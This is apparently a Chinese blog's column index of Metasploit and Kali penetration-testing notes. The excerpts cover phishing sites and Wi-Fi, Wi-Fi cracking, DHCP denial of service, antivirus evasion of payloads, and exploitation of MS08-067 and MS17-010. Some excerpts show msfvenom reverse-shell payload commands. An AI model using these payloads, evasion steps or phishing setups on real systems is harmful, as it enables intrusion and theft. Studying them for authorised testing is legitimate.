![](https://img-blog.csdnimg.cn/20210513112308896.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
精通Metasploit学习笔记
文章平均质量分 59
操作系统:kali2020
我重来不说话
无欲无求,随波逐流
展开
-
Veil-Evasion安装及使用
Veil-Evasion安装及使用1.安装veilapt-get install veil安装过程中有需要安装的软件全部点下一步即可如果安装完有任何错误,可以cd到/usr/share/veil-evasion/setup/目录下重新启动setup.sh脚本cd /usr/share/veil-evasion/setup/./setup.sh过程和上一步相同,安装完成后,输入veil出现以下画面,说明安装成功原创 2021-08-03 22:13:37 · 1917 阅读 · 0 评论 -
Metasploit+Beef整合攻击——超详细
文章目录前言一、准备工作1.配置beef2.配置Metasploit二、实际操作三、Beef隧道代理总结前言BeeF是前欧美最流行的web框架攻击平台,kali 集成Beef,而且Beef有很多好使的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,beef属于c/s结构,具体看图zombie(僵尸)即受害的浏览器。zombie是被hook(勾原创 2021-08-01 14:11:15 · 2280 阅读 · 1 评论 -
基于应用层的拒绝服务攻击——Yersinia/Metasploit
基于应用层的拒绝服务攻击本文中以DHCP为例环境:Kali2021方法一:Yersinia打开图形化界面yersinia -G选择Launch attack选择DHCP中的第二个sending DISCOVER packetsending RAW packet:发送原始数据包sending DISCOVER packet:发送请求获取IP地址数据包,占用所有IP,造成拒绝服务creating DHCP rogue server:穿件虚假的DHCP服务器,让用户连接,真正的DHC原创 2021-07-07 14:32:20 · 958 阅读 · 0 评论 -
Metasploit渗透测试全过程常用命令
文章目录前言0x01.MSF终端命令0x02.Meterpreter命令0x03.MSFvenom命令0x04.Metasploit 高级忍术0x05.Meterpreter 后渗透攻击阶段命令总结前言本文详细介绍了metasploit框架的各种接口与程序中最常用的命令和语法参考,以及metasploit后渗透命令参考0x01.MSF终端命令show exploits列出 Metasploit 框架中的所有渗透攻击模块。show payloads列出 Metasploit 框架中所有的攻原创 2021-06-24 12:51:35 · 1030 阅读 · 2 评论 -
使用kali搭建钓鱼WIFI——KARMA
文章目录前言0x01.安装DHCP服务器0x02.更改配置文件0x03.下载KARMA源文件0x04.设置网卡为监听模式0x05.创建假冒WIFI0x06.打开at0接口并运行DHCP服务0x07.加载KARMA源文件0x08.获取shell总结前言本文详细的介绍了使用kali搭建钓鱼wifi的过程,依赖Karmetasploit无线攻击套件测试环境描述ip主机kali2020192.168.1.113无线网卡D-link 802.11 n wlan0x0原创 2021-06-23 22:02:49 · 5885 阅读 · 1 评论 -
传染性媒体生成器和USB HID攻击向量——SET工具包
1.传染性媒体生成器是一个简单的攻击向量,可以烧到CD/DVD上或放到USB驱动器上具体生成方法如下: Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based原创 2021-06-22 22:07:56 · 463 阅读 · 3 评论 -
web多重攻击向量渗透测试——SET工具包
使用set工具包进行多重攻击,本例中包括的攻击方法由(JAVA Applet、Metasploit客户端渗透攻击、网页劫持攻击)具体过程如下:(过程有点多,请耐心看)使用setoolkit进入set工具包 01011001011011110111010100100000011100 10011001010110000101101100011011000111 10010010000001101000011000010111011001原创 2021-06-22 21:26:45 · 963 阅读 · 0 评论 -
制作钓鱼网站进行渗透测试——内网SET工具包
set工具包中的web攻击向量,可以克隆出与实际的可信站点看起来一模一样的网页,这使得受害者认为他们正在浏览一个合法的站点。本例子使用Java Applet攻击向量对用户进行欺骗以下是具体步骤setoolkit进入set工具包 _______________________________ / _____/\_ _____/\__ ___/ \_____ \ | __)_ | | /原创 2021-06-22 21:09:20 · 1331 阅读 · 1 评论 -
使用SET工具包发送钓鱼邮件
本文简单详细介绍了使用kali社会工程学工具包对目标单位进行多方面渗透测试配置SET工具包可以使用系统自带的set包,也可以更新到最新版本的,更新命令(建议备份好本地set)┌──(root????kali)-[/usr/share]└─# git clone https://github.com/trustedsec/social-engineer-toolkit.git set 针对性钓鱼攻击向量通过特殊构造的文件格式漏洞进行渗透攻击,本文例子为Adobe PDF漏洞客户端输入se原创 2021-06-08 16:35:03 · 1505 阅读 · 1 评论 -
使用kali破解WIFI——Aircrack-ng
文章目录前言一、配置网卡1.查看网卡名2.设置监听模式二、获取目标流量1.扫描附近wifi2.监听目标流量三、破解wifi密码1.攻击指定客户端2.暴力破解总结前言Aircrack-ng是kali linux自带的网络测试工具之一,是评估WIFI网络安全性的一整套工具。它侧重于WIFI安全的不同领域:监控:数据包捕获和数据导出到文本文件,以供第三方工具进一步处理攻击:通过数据包注入重播攻击,解除身份验证,虚假接入点等测试:检查WIFI卡和驱动程序功能(捕获和注入)破解:WEP和WPA PS原创 2021-06-08 10:30:37 · 20308 阅读 · 6 评论 -
ms10_002(极光漏洞)渗透步骤——MSF搭建钓鱼网站
本文简单介绍了如何使用metasploit针对ms10_002(极光漏洞)进行渗透测试,仅供学习测试环境描述ip主机kali2020192.168.1.113目标主机win xp sp3192.168.1.106①启动msf,搜索ms10_002,使用msf中的exploit攻击模块,设置参数msf6 > search ms10_002Matching Modules================ # Name .原创 2021-06-07 14:14:03 · 2099 阅读 · 1 评论 -
使用Metasploit生成攻击载荷——msfvenom免杀、upx加壳
文章目录前言一、免杀1.msfvenom的使用2.多重编码二、加壳1.upx的使用总结前言本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成器msfvenom),以及对攻击载荷进行免杀、加壳处理,从而突破杀毒软件一、免杀免杀字面意思就是避免被杀掉,准确点说就是创建的攻击载荷在对方电脑上运行的时候,可能会被杀毒软件干掉,使用相关技术让载荷躲过杀毒软件的扫描1.msfvenom的使用┌──(root????kali)-[~]└─# msfvenom info原创 2021-06-06 13:29:49 · 7114 阅读 · 0 评论 -
Metasploit常用后渗透脚本——远程监视
文章目录前言一、迁移进程二、安装远程VNC会话三、关闭杀毒软件四、获取系统密码哈希值五、查看目标机上的所有流量六、提取系统信息七、控制持久化八、查看更多脚本总结前言本文详细介绍了metasploit获取meterpreter权限常用的后渗透脚本的功能和实践过程测试环境描述ip主机kali 2020192.168.1.113靶机winxp sp3192.168.1.106首先使用ms08_067渗透模块对靶机进行渗透测试,详细步骤看ms08_067漏洞渗透步原创 2021-06-05 23:40:05 · 2305 阅读 · 0 评论 -
使用Metasploit搭建跳板——未更完
文章目录前言一、添加路由项方法一:①功能介绍②具体过程方法二:①介绍功能②具体过程二、进行攻击总结前言本文简单介绍了使用metasploit搭建跳板进行攻击一、添加路由项添加路由项功能:关于路由表,本人对metasploit使用添加路由项并没有深刻理解,仅供参考;方法一:使用run autoroute -p/-s①功能介绍[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Examp原创 2021-06-05 12:50:04 · 865 阅读 · 0 评论 -
使用Metasploit对MSSQL渗透测试步骤——学习笔记
学习笔记使用metasploit对MSSQL渗透测试方法(因为本人靶机没有mssql服务,所以只有方法hh)第一步,使用mssql_ping获取信息 Name: MSSQL Ping Utility Module: auxiliary/scanner/mssql/mssql_ping License: Metasploit Framework License (BSD) Rank: NormalProvided by: MC <mc@metasploit.原创 2021-06-04 21:41:11 · 1053 阅读 · 0 评论 -
使用Metasploit对MySQL进行渗透测试
文章目录前言一、db_nmap扫描1 常用nmap参数介绍2 具体过程二、查看版本1 介绍功能2 具体过程三、暴力破解密码1 介绍功能2 具体过程四、收集信息1 枚举数据库信息①介绍功能②具体过程2 导出密码hash①介绍功能②具体过程五、mysql认证漏洞利用1 介绍功能2 具体过程六、Mof提权1 介绍功能2 具体过程总结前言本文详细介绍了如何使用metasploit对mysql进行简单渗透测试一、db_nmap扫描使用外置和内置的都行,使用metasploit内置的nmap需要启动post原创 2021-06-04 21:24:35 · 1962 阅读 · 0 评论 -
Metasploit自动化攻击——装X必备
Metasploit自动化攻击——装X必备(1)首先进行一次普通渗透msf6 > search ms08_067Matching Modules================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- -----原创 2021-06-04 18:13:08 · 598 阅读 · 0 评论 -
渗透测试情报收集——侧重Metasploit
文章目录前期情报收集1.被动(1)whois查询(2) Shodan搜素(3)nslookup2.主动(1)nmap端口扫描(2)高级nmap扫描:TCP空闲扫描(3)使用metasploit进行端口扫描3.针对性扫描(1)smb服务(2)搜索Microsoft SQL Server(3)ssh服务(4)ftp服务(5)SNMP服务总结前期情报收集1.被动(1)whois查询msf6 > whois baidu.com[*] exec: whois baidu.com(2) Shoda原创 2021-06-04 11:20:38 · 529 阅读 · 0 评论 -
使用Metasploit对Windows系统渗透测试——加壳免杀花指令
文章目录前言一、生成被控端攻击载荷二、使用步骤1.引入库2.读入数据总结前言详细介绍了使用metasploit对windows系统进行渗透测试测试环境描述IP地址主机kali 2020——msf6192.168.1.113靶机1windows 10 1805192.168.1.靶机2windows 7 x64靶机3windows xp sp3一、生成被控端攻击载荷示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分原创 2021-05-21 21:26:51 · 2582 阅读 · 6 评论 -
ms17_010(永恒之蓝)漏洞渗透步骤——MSF
测试环境描述ip主机kali2020192.168.1.113目标主机win xp sp3192.168.1.108①启动msf,搜索ms17_010,使用msf中的auxiliary模块进行扫描msf6 > search ms17_010Matching Modules================ # Name Disclosure Date Rank...原创 2021-05-20 09:03:25 · 2259 阅读 · 0 评论 -
ms08_067漏洞渗透步骤——MSF
测试环境描述ip主机kali2020192.168.1.113目标主机win xp sp3192.168.1.108①启动msf,搜索ms08_067msf6 > search ms08_067Matching Modules================ # Name Disclosure Date Rank Check Description - ---- ...原创 2021-05-20 08:56:21 · 1300 阅读 · 0 评论 -
提高Metasploit渗透测试的速度
这里写目录标题1.两个命令pushm和popm,模块入栈出栈2.loadpath加载特定文件夹内的模块3.reload,edit,reload_all4.资源脚本5.使用AutoRunScript1.两个命令pushm和popm,模块入栈出栈msf6 exploit(multi/handler) > pushmmsf6 exploit(multi/handler) > search ms08_067usMatching Modules================ # N原创 2021-05-14 18:53:17 · 293 阅读 · 0 评论 -
Metasploit后渗透命令大全讲解——超详细
文章目录前言一、基本后渗透命令1.帮助菜单2.后台命令3.机器ID和UUID命令4.通信信道5.获取用户和进程信息6.获取系统信息7.网络命令总结前言获取meterpreter权限后,使用后渗透命令完成目的操作一、基本后渗透命令获取meterpreter可以使用的命令,用来控制目标主机1.帮助菜单meterpreter > helpCore Commands============= Command Description原创 2021-05-14 10:10:59 · 3145 阅读 · 3 评论 -
使用Metasploit对Andorid系统渗透测试提权——定位拍照发短信
文章目录前言一、生成攻击载荷二、加载主控端handler总结前言使用metasploit对安卓系统渗透测试提权一、生成攻击载荷┌──(root????kali)-[~]└─# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.113 lport=6666 R> pay2.apk[-] No platform was selected, choosing Msf::Module::Platform::Android f原创 2021-05-13 13:15:50 · 2044 阅读 · 0 评论 -
使用metasploit对linux系统进行渗透测试提权
文章目录前言一、生成攻击载荷二、获取目标主机物理访问权限三、加载主控端handler总结前言使用metasploit对linux系统进行渗透测试一、生成攻击载荷使用msfvenom命令创建一个elf文件┌──(root????kali)-[~]└─# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.113 lport=5555 -f elf>pay.elf[-] No platform was selecte原创 2021-05-13 12:55:21 · 2182 阅读 · 0 评论 -
使用Metasploit生成Word文件对目标进行渗透测试
上一篇提到了使用恶意PDF对目标主机进行渗透测试,这次简单提一下使用word文件进行渗透攻击,没看过上一篇的可以看一下,了解下基本步骤使用恶意PDF进行渗透测试测试用例描述漏洞microsoft word中的RTF分析器中的pFragments属性容易受到栈缓存区溢出攻击受影响的系统Microsoft Office XP SP,2003 SP3,2007 SP2,2010 x32,2010 x64,Microsoft Office for Mac 2011生成恶意wo原创 2021-05-13 12:14:41 · 728 阅读 · 0 评论 -
使用Metasploit生成PDF文件对目标进行渗透测试
文章目录前言一、漏洞介绍二、渗透步骤1.生成恶意pdf文件2.启动主控端handler总结前言使用PDF文件对目标进行渗透测试一、漏洞介绍测试案例描述漏洞Smart Independent Glyplets (SING)表中的uniquename存在着栈溢出漏洞影响到的版本windows、macintosh和unix的Adobe Reader 9.3.4 / Acrobat 9.3.4及更早版本示例:pandas 是基于NumPy 的一种工具,该工具是为了解决原创 2021-05-13 11:17:08 · 974 阅读 · 0 评论 -
使用metasploit制作钓鱼网站——browser autopwn攻击
文章目录前言一、browser autopwn攻击二、对网站的客户端进行渗透前言使用metasploit对客户端渗透测试一、browser autopwn攻击msf6 > use auxiliary/server/browser_autopwnmsf6 auxiliary(server/browser_autopwn) > optionsModule options (auxiliary/server/browser_autopwn): Name Current原创 2021-05-12 19:22:55 · 763 阅读 · 0 评论 -
Kali2020安装openVAS遇到的问题
文章目录虚拟化测试虚拟化测试使用metasploit完成一次渗透测试三种方法黑盒测试:测试工程师掌握几乎为0,只能从互联网收集信息(好比本公司对外公司渗透)白盒测试:测试工程师已经掌握了全部的系统信息和必要的账户信息、源代码、环境有关的信息灰盒测试:介于两盒之间(掌握少量的)...原创 2021-05-12 09:28:31 · 2404 阅读 · 5 评论 -
使用metasploit对VOIP渗透测试提权——SipXphone Version 2.0.6.27
文章目录前言一、对VOIP服务踩点二、欺骗性VOIP电话三、对VOIP进行渗透总结前言本文简单介绍了使用metasploit对VOIP服务进行渗透测试提权,目标程序SipXphone Version 2.0.6.27一、对VOIP服务踩点使用metasploit内置的sip扫描模块进行扫描msf6 > use auxiliary/scanner/sip/optionsmsf6 auxiliary(scanner/sip/options) > optionsModule opt原创 2021-05-11 10:50:19 · 468 阅读 · 0 评论 -
使用metasploit对SQL server渗透测试提权
文章目录前言一、使用nmap进行踩点二、使用metasploit进行扫描三、破解sqlserver密码四、查找服务器其他用户口令五、浏览SQL server六、后渗透总结前言简单介绍了使用metasploit对SQL server进行渗透测试提权一、使用nmap进行踩点db_nmap -sV -p1433 1434 192.168.1.106 #使用nmap进行扫描services #显示出服务db_namp -sU --script=ms-sql-info -p1434 192.168.1原创 2021-05-11 10:20:29 · 697 阅读 · 0 评论 -
使用Metasploit对DATAC RealWin SCADA Server 2.0进行渗透
文章目录前言攻击前言使用Metasploit对DATAC RealWin SCADA Server 2.0进行渗透攻击msf6 > use exploit/windows/scada/realwin_scpc_initialize[*] No payload configured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(windows/scada/realwin_scpc_initialize) > o原创 2021-05-10 21:19:44 · 215 阅读 · 0 评论 -
使用metasploit寻找SCADA服务
文章目录前言一、SCADA系统二、使用步骤总结前言使用metasploit寻找SCADA服务一、SCADA系统SCADA系统是ICS系统,通常用在一些很关键的环境中,例如一些大型企业中,负责各种生产过程二、使用步骤需要在shodan网站注册一个账号,并且拿到APIKEYmsf6 exploit(windows/smb/ms08_067_netapi) > use auxiliary/gather/shodan_searchmsf6 auxiliary(gather/shodan原创 2021-05-10 21:04:59 · 184 阅读 · 0 评论 -
获取meterpreter权限后无法运行ruby代码——bug记录
项目场景:使用kali成功渗透winxp主机后,获取meterpreter权限msf6 exploit(windows/smb/ms08_067_netapi) > run[*] Started reverse TCP handler on 192.168.1.113:4444 [*] 192.168.1.115:445 - Attempting to trigger the vulnerability...[*] Sending stage (175174 bytes) to 192.1原创 2021-05-09 21:43:20 · 584 阅读 · 0 评论 -
自定义meterpreter脚本(代码记录)
整体代码,这个脚本会检查我们现在是否为管理员,然后找到explorer进程,并自动迁移到这个进程admin_check = is_admin?if(admin_check) print_good("Current user is admin")else print_error("Current uesr is not admin")endsession.sys.process.get_processes().each do |x| if x['name'].downca.原创 2021-05-09 12:26:56 · 338 阅读 · 0 评论 -
突破meterpreter建立永久访问权限访问其他主机——借刀杀人
文章目录前言一、使用场景二、实施步骤1.渗透b主机2.建立socks代理服务器3.设置浏览器代理4.设置永久访问权限总结前言渗透目标主机,对目标主机搭建跳板建立代理服务器,通过代理主机访问其他主机,不留痕迹一、使用场景主机a想访问c无法访问,c只让特定的IP地址访问,例如b,此时就可以先渗透b,在上面搭建跳板建立代理服务器,通过代理服务器访问c本期例子,a主机使用kali,b主机winxp,c主机linux二、实施步骤1.渗透b主机因为目标位winxp,先使用最常用的MS08_06原创 2021-05-09 09:59:09 · 1703 阅读 · 1 评论 -
Metasploit自定义FTP扫描模块——超详细
文章目录前言一、metasploit框架的体系结构二、了解现有模块三、自定义FTP扫描程序模块1.编写代码2.运行自定义模块(1)没有重新加载模块(2)语法格式有错误总结前言开发metasploit自定义模块,了解现有模块机制一、metasploit框架的体系结构metasploit基础库文件基础库文件名称用途Ruby扩展(REX)处理几乎所有的核心功能MSF核心提供基本的API和框架的实际核心MSF基础对模块提供API模块类型模块类型功原创 2021-05-08 21:28:36 · 1072 阅读 · 0 评论 -
一小时看懂Ruby代码基本逻辑(自定义metasploit模块)
学习目标:一天看懂Ruby代码基本逻辑(默认已有其他编程语言基础)学习内容:创建第一个ruby程序ruby中的变量和数据类型ruby中的方法决策运算符ruby中的循环正则表达式以上内容仅列出一部分,仅仅是为了可以看懂metasploit脚本学习时间:专心学习只需要一个小时学习产出:1.建第一个ruby程序ruby语言可以在命令行进行交互。输出irb来启动┌──(root????kali)-[~]└─# irb irb(main):001:0>原创 2021-05-07 19:41:29 · 334 阅读 · 0 评论 -
利用Metasploit对HFS 2.3渗透攻击提权
文章目录前言一、Metasploit中使用数据库二、VSFTPD2.3.4渗透攻击1.威胁建模2.攻击3.渗透持久化4.清楚渗透痕迹总结前言针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer)一、Metasploit中使用数据库开启步骤root@kali:~# service postgresql startroot@kali:~# msfdb initmsfdb ini 初始化数据库使用msfconsole启动metasploit输入db_statu原创 2021-05-07 12:16:01 · 1733 阅读 · 0 评论 -
利用Metasploit对PHP5.2.4渗透测试提权
文章目录前言一、启动metasploit数据库二、PHP5.2.4渗透测试1.设置相关渗透模块2.提权总结前言针对PHP5.2.4进行渗透测试提权一、启动metasploit数据库启动metasploit在上一篇文章已经详细介绍利用db_nmap扫描到的结果,在进行services -u 过滤结果msf6 > services -uServices========host port proto name state info--原创 2021-05-06 22:53:26 · 1656 阅读 · 2 评论